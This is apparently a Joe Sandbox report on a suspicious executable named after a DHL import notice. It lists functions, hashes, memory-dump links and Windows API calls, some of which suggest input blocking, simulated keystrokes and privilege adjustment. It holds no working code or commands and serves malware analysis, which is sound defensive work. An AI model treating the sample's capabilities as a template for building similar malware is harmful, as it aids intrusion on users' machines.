Associated: 00000000.00000002.1659323300.00000000005A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659355917.00000000005AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659367272.00000000005B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4e0000_DHL_IMPORT_8236820594.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2fbdbeface8d474e65e3d830227d731b015bc4fe83c76ff0107a9da6199ccf29
Instruction ID: a377e32219a754fa4751ce2137040b2b3056d15b7df7ee2fb16291e6b54696f1
Opcode Fuzzy Hash: 2fbdbeface8d474e65e3d830227d731b015bc4fe83c76ff0107a9da6199ccf29
Instruction Fuzzy Hash: DA021D72E001199BDF14CFA9C8846ADBFF5FF89314F254269D819EB381D731AD418B94

Function 004ECAF0 Relevance: 3.2, Strings: 2, Instructions: 659COMMON

Download Yara Rule

Strings

p#[, xrefs: 004ECF7F
Variable is not of type 'Object'., xrefs: 00530C40

Memory Dump Source

Source File: 00000000.00000002.1659283695.00000000004E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true

Associated: 00000000.00000002.1659273246.00000000004E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659323300.000000000057C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659323300.00000000005A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659355917.00000000005AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659367272.00000000005B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4e0000_DHL_IMPORT_8236820594.jbxd

Similarity

API ID:
String ID: Variable is not of type 'Object'.$p#[
API String ID: 0-2909421393
Opcode ID: a238770e7b5955337a543e855aae6b1fcefc8232fec18db96e0c81467d6b6fe2
Instruction ID: cb45bf64cee86324944a16344b7e4685cf1eb1457692752c586de99d2bb95f6c
Opcode Fuzzy Hash: a238770e7b5955337a543e855aae6b1fcefc8232fec18db96e0c81467d6b6fe2
Instruction Fuzzy Hash: B232AF30900258DFCF14DF96C8D1AEEBBB5FF04309F20405AE816AB292D779AD46DB65

Function 005568EE Relevance: 3.1, APIs: 2, Instructions: 57fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(?,?), ref: 00556918
FindClose.KERNEL32(00000000), ref: 00556961

Memory Dump Source

Source File: 00000000.00000002.1659283695.00000000004E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true

Associated: 00000000.00000002.1659273246.00000000004E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659323300.000000000057C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659323300.00000000005A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659355917.00000000005AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659367272.00000000005B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4e0000_DHL_IMPORT_8236820594.jbxd

Similarity

API ID: Find$CloseFileFirst
String ID:
API String ID: 2295610775-0
Opcode ID: 319571afe2cf4b65ee492266b110c6ae1cb042e8d295cd76c47f3f903d0ae983
Instruction ID: 5e8f228db352ce3a914bb48c5023dcbe6e82ed4c1f031ee297fae2bc8902028b
Opcode Fuzzy Hash: 319571afe2cf4b65ee492266b110c6ae1cb042e8d295cd76c47f3f903d0ae983
Instruction Fuzzy Hash: 2011D3356042409FC710CF2AD484A16BBE0FF84329F44C69EE8698F2A2CB34EC49CB91

Function 005537B5 Relevance: 3.0, APIs: 2, Instructions: 33windowCOMMON

Download Yara Rule

APIs

GetLastError.KERNEL32(00000000,?,00000FFF,00000000,?,?,?,00564891,?,?,00000035,?), ref: 005537E4
FormatMessageW.KERNEL32(00001000,00000000,?,00000000,?,00000FFF,00000000,?,?,?,00564891,?,?,00000035,?), ref: 005537F4

Memory Dump Source

Source File: 00000000.00000002.1659283695.00000000004E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true

Associated: 00000000.00000002.1659273246.00000000004E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659323300.000000000057C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659323300.00000000005A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659355917.00000000005AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659367272.00000000005B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4e0000_DHL_IMPORT_8236820594.jbxd

Similarity

API ID: ErrorFormatLastMessage
String ID:
API String ID: 3479602957-0
Opcode ID: bcdb60dc414752f8fba076a56f5d17e327c6790f459574702723697ec287086e
Instruction ID: 5c7a4aca96a27841779962f1b47330644b1d05ab0e4d806a1adca724c819683d
Opcode Fuzzy Hash: bcdb60dc414752f8fba076a56f5d17e327c6790f459574702723697ec287086e
Instruction Fuzzy Hash: E3F0EC706042252AE71057765C4DFDB3E9DEFC5761F000565F50DD22C1D9605E48D7B0

Function 0054B226 Relevance: 3.0, APIs: 2, Instructions: 29keyboardCOMMON

Download Yara Rule

APIs

SendInput.USER32(00000001,?,0000001C,?,?,00000002), ref: 0054B25D
keybd_event.USER32(?,75C0C0D0,?,00000000), ref: 0054B270

Memory Dump Source

Source File: 00000000.00000002.1659283695.00000000004E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true

Associated: 00000000.00000002.1659273246.00000000004E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659323300.000000000057C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659323300.00000000005A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659355917.00000000005AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659367272.00000000005B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4e0000_DHL_IMPORT_8236820594.jbxd

Similarity

API ID: InputSendkeybd_event
String ID:
API String ID: 3536248340-0
Opcode ID: aa8b9e4fab1a48f597cd86f218c24c0ee7ad3d03a183b8520504b23c3e802208
Instruction ID: 8b936322a8aeb0f7557c027d15233e6210324f5b653db13f4781f4012f9cf51f
Opcode Fuzzy Hash: aa8b9e4fab1a48f597cd86f218c24c0ee7ad3d03a183b8520504b23c3e802208
Instruction Fuzzy Hash: D9F06D7480424EABEB059FA0D805BEE7FB0FF04309F008009F955A6191C379C205AF94

Function 005410BF Relevance: 3.0, APIs: 2, Instructions: 24COMMON

Download Yara Rule

APIs

AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,005411FC), ref: 005410D4
CloseHandle.KERNEL32(?,?,005411FC), ref: 005410E9

Memory Dump Source

Source File: 00000000.00000002.1659283695.00000000004E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true

Associated: 00000000.00000002.1659273246.00000000004E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659323300.000000000057C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659323300.00000000005A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659355917.00000000005AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659367272.00000000005B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4e0000_DHL_IMPORT_8236820594.jbxd

Similarity

API ID: AdjustCloseHandlePrivilegesToken
String ID:
API String ID: 81990902-0
Opcode ID: 6158c2d84225f0cd9d5dc3fd67768868dac4cf25e2823f69e992c0b3ad6363c1
Instruction ID: f79b4611b281a97edcd128b94a19e648d6b11f632367688f7afcfabf1dc38469
Opcode Fuzzy Hash: 6158c2d84225f0cd9d5dc3fd67768868dac4cf25e2823f69e992c0b3ad6363c1
Instruction Fuzzy Hash: D2E0BF72014610AFF7252B51FC09E777BA9FF04314B14882EF5AA804B1DB626CD4EB54

Function 0051676B Relevance: 1.8, APIs: 1, Instructions: 269COMMONLIBRARYCODE

Download Yara Rule

APIs

RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,00516766,?,?,00000008,?,?,0051FEFE,00000000), ref: 00516998

Memory Dump Source

Source File: 00000000.00000002.1659283695.00000000004E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true

Associated: 00000000.00000002.1659273246.00000000004E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659323300.000000000057C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659323300.00000000005A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659355917.00000000005AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659367272.00000000005B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4e0000_DHL_IMPORT_8236820594.jbxd

Similarity

API ID: ExceptionRaise
String ID:
API String ID: 3997070919-0
Opcode ID: 9f40265d75db66c9c47661035ce981e2211fca6c71ea88c2a7d14aef38435822
Instruction ID: dde00c3a46069162c7627cf6270c28c03640fd10de80273eb97b7e32c86191ea
Opcode Fuzzy Hash: 9f40265d75db66c9c47661035ce981e2211fca6c71ea88c2a7d14aef38435822
Instruction Fuzzy Hash: 3DB13A35610609DFE719CF28C48ABA57FE0FF45364F298658E899CF2A2C735E991CB40

Function 004FB119 Relevance: 1.8, Strings: 1, Instructions: 511COMMON

Download Yara Rule

Strings

, xrefs: 0053851F

Memory Dump Source

Source File: 00000000.00000002.1659283695.00000000004E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true

Associated: 00000000.00000002.1659273246.00000000004E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659323300.000000000057C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659323300.00000000005A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659355917.00000000005AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659367272.00000000005B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4e0000_DHL_IMPORT_8236820594.jbxd

Similarity

API ID:
String ID:
API String ID: 0-3916222277
Opcode ID: 5ea32cd0c45a433e8b64e362ce69fb8b47c9f772d759a7aa3698a9ea8df9da4e
Instruction ID: a0c4905a510b3311fd3b2d65bf6556afa56cb2c8c048815ef982036d92a1ed24
Opcode Fuzzy Hash: 5ea32cd0c45a433e8b64e362ce69fb8b47c9f772d759a7aa3698a9ea8df9da4e
Instruction Fuzzy Hash: DC125E759002299FDB14CF58C980AFEBBB5FF48710F14819AE949EB251EB349E81CF94

Function 0055EAA2 Relevance: 1.5, APIs: 1, Instructions: 25keyboardCOMMON

Download Yara Rule

APIs

BlockInput.USER32(00000001), ref: 0055EABD

Memory Dump Source

Source File: 00000000.00000002.1659283695.00000000004E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true

Associated: 00000000.00000002.1659273246.00000000004E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659323300.000000000057C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659323300.00000000005A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659355917.00000000005AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659367272.00000000005B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4e0000_DHL_IMPORT_8236820594.jbxd

Similarity

API ID: BlockInput
String ID:
API String ID: 3456056419-0
Opcode ID: 5bfa576a67bae885a6ca50eb9e1318aef645674c9b01609a07a865d2b4dcfd43
Instruction ID: 3695f0c65abc3250bd587cad555f0e969c4bf6f4932b82ffd515b19a9f52700b
Opcode Fuzzy Hash: 5bfa576a67bae885a6ca50eb9e1318aef645674c9b01609a07a865d2b4dcfd43
Instruction Fuzzy Hash: 0CE01A31200204AFC710EF6AD859E9ABBEDBF98765F00841BFD4AC7291DA74A9458B90

Function 005009D5 Relevance: 1.5, APIs: 1, Instructions: 3COMMON

Download Yara Rule

APIs

SetUnhandledExceptionFilter.KERNEL32(Function_000209E1,005003EE), ref: 005009DA

Memory Dump Source

Source File: 00000000.00000002.1659283695.00000000004E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true

Associated: 00000000.00000002.1659273246.00000000004E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659323300.000000000057C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659323300.00000000005A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659355917.00000000005AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659367272.00000000005B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4e0000_DHL_IMPORT_8236820594.jbxd

Similarity

API ID: ExceptionFilterUnhandled
String ID:
API String ID: 3192549508-0
Opcode ID: bd66d2c86959b8abab694bd32fd28ca3924c7796ffbc53aacc218b8450242ccc
Instruction ID: c28dccb1e17720edda7fb841141fd9fc3dc0d6ad526f9c77ef9fdde0b7059c0d
Opcode Fuzzy Hash: bd66d2c86959b8abab694bd32fd28ca3924c7796ffbc53aacc218b8450242ccc
Instruction Fuzzy Hash:

Function 0050781B Relevance: 1.5, Strings: 1, Instructions: 214COMMON

Download Yara Rule

Strings

0, xrefs: 0050798B

Memory Dump Source

Source File: 00000000.00000002.1659283695.00000000004E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true

Associated: 00000000.00000002.1659273246.00000000004E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659323300.000000000057C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659323300.00000000005A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659355917.00000000005AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659367272.00000000005B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4e0000_DHL_IMPORT_8236820594.jbxd

Similarity

API ID:
String ID: 0
API String ID: 0-4108050209
Opcode ID: 9084b4e029052128895840c3c28e948f6724b1d83b91d22a18243ac96ad56844
Instruction ID: d1ea49cff8dd8d0e3ace3edd1312e5a5f1dcff7190282b9df17e14161ea0156d
Opcode Fuzzy Hash: 9084b4e029052128895840c3c28e948f6724b1d83b91d22a18243ac96ad56844
Instruction Fuzzy Hash: 89516A71E0CA0E5BDB388528895DBBE2F85BF5E300F188D09D882D72C2C611FE41D366

Function 00552046 Relevance: 1.3, Strings: 1, Instructions: 72COMMON

Download Yara Rule

Strings

0&[, xrefs: 00552053

Memory Dump Source

Source File: 00000000.00000002.1659283695.00000000004E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true

Associated: 00000000.00000002.1659273246.00000000004E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659323300.000000000057C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659323300.00000000005A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659355917.00000000005AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659367272.00000000005B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4e0000_DHL_IMPORT_8236820594.jbxd

Similarity

API ID:
String ID: 0&[
API String ID: 0-3830265818
Opcode ID: dce3ff22a2a0f97fb80fdd9a427795c0280aacf29e4074149814e464fdd3f308
Instruction ID: 4ab8908c07a85c783c249062c9443d5d4382fb96245262fa2f3d877ea3af7f72
Opcode Fuzzy Hash: dce3ff22a2a0f97fb80fdd9a427795c0280aacf29e4074149814e464fdd3f308
Instruction Fuzzy Hash: 5221E7326216118BDB28CF79C82767E77E5B764310F148A2EE4A7C33D0DE35A908DB90

Function 00516DD9 Relevance: .6, Instructions: 637COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1659283695.00000000004E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true

Associated: 00000000.00000002.1659273246.00000000004E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659323300.000000000057C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659323300.00000000005A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659355917.00000000005AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659367272.00000000005B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4e0000_DHL_IMPORT_8236820594.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fcde0e28032f229e2d256b05f4ff0efbfa19d7bf2fb50ccfab51e7950e7eb187
Instruction ID: 04b02ea531d2d46836740e89e557cb698c047c9d3216142f52c28b766014b3f6
Opcode Fuzzy Hash: fcde0e28032f229e2d256b05f4ff0efbfa19d7bf2fb50ccfab51e7950e7eb187
Instruction Fuzzy Hash: 01322531D29F054EE7239638D8223356A99BFBB3C5F15D737E81AB59A5EB28C4C35200

Function 004FCC39 Relevance: .6, Instructions: 635COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1659283695.00000000004E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true

Associated: 00000000.00000002.1659273246.00000000004E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659323300.000000000057C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659323300.00000000005A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659355917.00000000005AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659367272.00000000005B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4e0000_DHL_IMPORT_8236820594.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c0704642a030d53dcae448b3e917220f3fe9ee757418fee87c8f128a5bc220a8
Instruction ID: ff10afc0bf061e0f4e07834bcf87b699197451768764ee57981985fb1fd0191f
Opcode Fuzzy Hash: c0704642a030d53dcae448b3e917220f3fe9ee757418fee87c8f128a5bc220a8
Instruction Fuzzy Hash: 3A322332A0019D8BCF28CF29C5D467DBFA1FB45304F28896BE95AAB791D234DD81DB50

Function 004E7920 Relevance: .6, Instructions: 563COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1659283695.00000000004E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true

Associated: 00000000.00000002.1659273246.00000000004E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659323300.000000000057C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659323300.00000000005A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659355917.00000000005AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659367272.00000000005B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4e0000_DHL_IMPORT_8236820594.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 592b007cb6c207f544bd129a0ab209ca22aadaabb4d90a7e95c691281991a3a0
Instruction ID: 35e035a0ce667dc913cfbcf1d974aee6c2b50a041010ea186152b9cbcadd49fc
Opcode Fuzzy Hash: 592b007cb6c207f544bd129a0ab209ca22aadaabb4d90a7e95c691281991a3a0
Instruction Fuzzy Hash: 3122F3B0A0060ADFDF14CF66D881AAEB7F5FF45314F20452AE812A72D1EB39AD15CB54

Function 004E91C0 Relevance: .5, Instructions: 475COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1659283695.00000000004E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true

Associated: 00000000.00000002.1659273246.00000000004E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659323300.000000000057C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659323300.00000000005A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659355917.00000000005AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659367272.00000000005B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4e0000_DHL_IMPORT_8236820594.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7e2549705fba320ae01cb8a457eb48adc1838ee9e68388467d71fc9805149a51
Instruction ID: 9b0f4ee5b70ad6730ecb50920938044ce60b70b1e2d5ef092754122d0477b532
Opcode Fuzzy Hash: 7e2549705fba320ae01cb8a457eb48adc1838ee9e68388467d71fc9805149a51
Instruction Fuzzy Hash: 8C02E7B0E00119EBCF04DF55D882AAEBBB1FF55304F10856AE9069B2D1EB35EE15CB85

Function 00501C77 Relevance: .3, Instructions: 254COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1659283695.00000000004E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true

Associated: 00000000.00000002.1659273246.00000000004E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659323300.000000000057C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659323300.00000000005A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659355917.00000000005AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659367272.00000000005B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4e0000_DHL_IMPORT_8236820594.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 93657a121f16255c59120ad0d08fdbba6372c273009ad596b4ecdf6e8f3c6909
Instruction ID: 61109555c516287b33ac28ca8792e4d80dd748c7b73c660018c35886bdc71447
Opcode Fuzzy Hash: 93657a121f16255c59120ad0d08fdbba6372c273009ad596b4ecdf6e8f3c6909
Instruction Fuzzy Hash: 7A9176732084A34ADB29463E857403EFFE17B923A171A0B9DE4F2CA1C5FE24D954D625

Function 005019B0 Relevance: .2, Instructions: 240COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1659283695.00000000004E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true

Associated: 00000000.00000002.1659273246.00000000004E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659323300.000000000057C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659323300.00000000005A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659355917.00000000005AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659367272.00000000005B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4e0000_DHL_IMPORT_8236820594.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 40101273f58913c3cb3bc7eb54df01d47b4121c3e67d19f11ec2cb23d33ea445
Instruction ID: 9f8201287cfd92bc00f4b9b2f70b1ffcaf0532b77d1a5042666ba07e513a30f5
Opcode Fuzzy Hash: 40101273f58913c3cb3bc7eb54df01d47b4121c3e67d19f11ec2cb23d33ea445
Instruction Fuzzy Hash: F89155722098A34ADB2D467A857403EFFE16B923A131A0B9DD4F2CB1C1FE14C554D665

Function 00507A4A Relevance: .2, Instructions: 237COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1659283695.00000000004E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true

Associated: 00000000.00000002.1659273246.00000000004E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659323300.000000000057C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659323300.00000000005A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659355917.00000000005AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659367272.00000000005B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4e0000_DHL_IMPORT_8236820594.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 79f6fe69c0ada857a258c814d174261d8700f90ab1fcb304c299913934d5eb9a
Instruction ID: 83a4ebcec6f49b7a80bf47ab6b6db61e9c341ec4bdea882d54256b3115984ee1
Opcode Fuzzy Hash: 79f6fe69c0ada857a258c814d174261d8700f90ab1fcb304c299913934d5eb9a
Instruction Fuzzy Hash: D9612971F08B4E66DE3459288999BBE3F94FF8D710F140D19E882DB2C1EA51BE42C355

Function 00507CA7 Relevance: .2, Instructions: 237COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1659283695.00000000004E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true

Associated: 00000000.00000002.1659273246.00000000004E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659323300.000000000057C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659323300.00000000005A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659355917.00000000005AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659367272.00000000005B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4e0000_DHL_IMPORT_8236820594.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 20ae3132f6bbd6628cb40c2452141b215e9acc9e65b593a4ea9eca56c1639a2e
Instruction ID: 87cd7d9132baeaf6a241cc07012e63e10684842cfe52f86f991ab719cb0226cf
Opcode Fuzzy Hash: 20ae3132f6bbd6628cb40c2452141b215e9acc9e65b593a4ea9eca56c1639a2e
Instruction Fuzzy Hash: B1615C72E0870E66DE385A388856BBF2F98FF9D700F140D59E982DB2C1D912FD42C255

Function 00501706 Relevance: .2, Instructions: 232COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1659283695.00000000004E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true

Associated: 00000000.00000002.1659273246.00000000004E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659323300.000000000057C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659323300.00000000005A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659355917.00000000005AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659367272.00000000005B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4e0000_DHL_IMPORT_8236820594.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 70da388f96bbbf26b230a155b4728740b34f0d100ea60ab2bbadb9d7d0befbf0
Instruction ID: 603b59a620d3951b470f2949de76ab368831a1f12a60ed2fb64befac80277987
Opcode Fuzzy Hash: 70da388f96bbbf26b230a155b4728740b34f0d100ea60ab2bbadb9d7d0befbf0
Instruction Fuzzy Hash: A68195326084A34ADB2D467A857443EFFE1BF923A131A0B9DD4F2CB1C1EE24C654E625

Function 00562ADE Relevance: 77.5, APIs: 40, Strings: 4, Instructions: 486filecommemoryCOMMON

Download Yara Rule

APIs

DeleteObject.GDI32(00000000), ref: 00562B30
DeleteObject.GDI32(00000000), ref: 00562B43
DestroyWindow.USER32 ref: 00562B52
GetDesktopWindow.USER32 ref: 00562B6D
GetWindowRect.USER32(00000000), ref: 00562B74
SetRect.USER32(?,00000000,00000000,00000007,00000002), ref: 00562CA3
AdjustWindowRectEx.USER32(?,88C00000,00000000,?), ref: 00562CB1
CreateWindowExW.USER32(?,AutoIt v3,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00562CF8
GetClientRect.USER32(00000000,?), ref: 00562D04
CreateWindowExW.USER32(00000000,static,00000000,5000000E,00000000,00000000,?,?,00000000,00000000,00000000), ref: 00562D40
